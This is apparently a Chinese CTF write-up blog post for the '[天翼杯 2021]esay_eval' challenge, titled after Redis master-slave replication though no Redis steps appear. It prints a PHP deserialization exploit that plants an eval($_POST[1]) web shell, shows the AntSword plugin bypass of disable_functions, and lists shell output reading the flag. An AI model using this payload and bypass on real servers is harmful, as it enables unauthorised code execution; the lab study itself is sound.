主从复制Redis

[蚁剑插件之绕disable_functions-CSDN博客](https://blog.csdn.net/zlzg007/article/details/108462813#:~:text=蚁剑插件之绕disable_functions概述有些网站会禁用php中的一些危险函数,导致即使上传马上去,也执行不了命令,很典型的就是宝塔的网站。 蚁剑有个插件专门用于解决这个问题。,绕过的方法有好几种,大多都是针对linux%2C有一个windows能用,但经过尝试还是不行,所以说如果碰到windows这种情况,就可以直接放弃了。 方法直接运行插件,选择绕过方式:然后,直接开始,运行成功后会生成两个文件:直接使用蚁剑连接.antproxy.php那个文件,密码还是原来的密码,就可以命令执行了_disable_functions)

例题:[天翼杯 2021]esay_eval

天翼杯 2021]esay_eval——Redis(主从复制)提权初见_redis主从提权-CSDN博客

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);

}
function __wakeup(){
$this->code = "";
}
}

class B{
function __destruct(){
echo $this->a->a();
}
}

if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class a{
function __construct(){
$this->code="eval($_POST[1]);";
}
}

class b{
public $a;
}

$c=new b();
$c->a=new a();
echo serialize($c);

//O:1:"b":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:16:"eval($_POST[1]);";}}

蚁剑连

image-20231202232300648

方法一 使用蚁剑插件

右键加载插件绕过disable_functions

image-20231202232336149

模式选择PHP_Concat_UAF,点击开始

image-20231202232534457

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
(www-data:/var/www/html) $ ls
config.php.swp
index.php

(www-data:/var/www/html) $ ls /
bin
boot
dev
etc
flagaasdbjanssctf
home
lib
lib64
media
mnt
opt
proc
redis-5.0.10
root
run
run.sh
sbin
srv
sys
tmp
usr
var

(www-data:/var/www/html) $ cat /f*
NSSCTF{524d9644-669d-42b6-8ac2-f8b3554d6254}

主从复制Redis
http://example.com/2023/12/02/主从复制Redis/
作者
Whhxy4
发布于
2023年12月2日
许可协议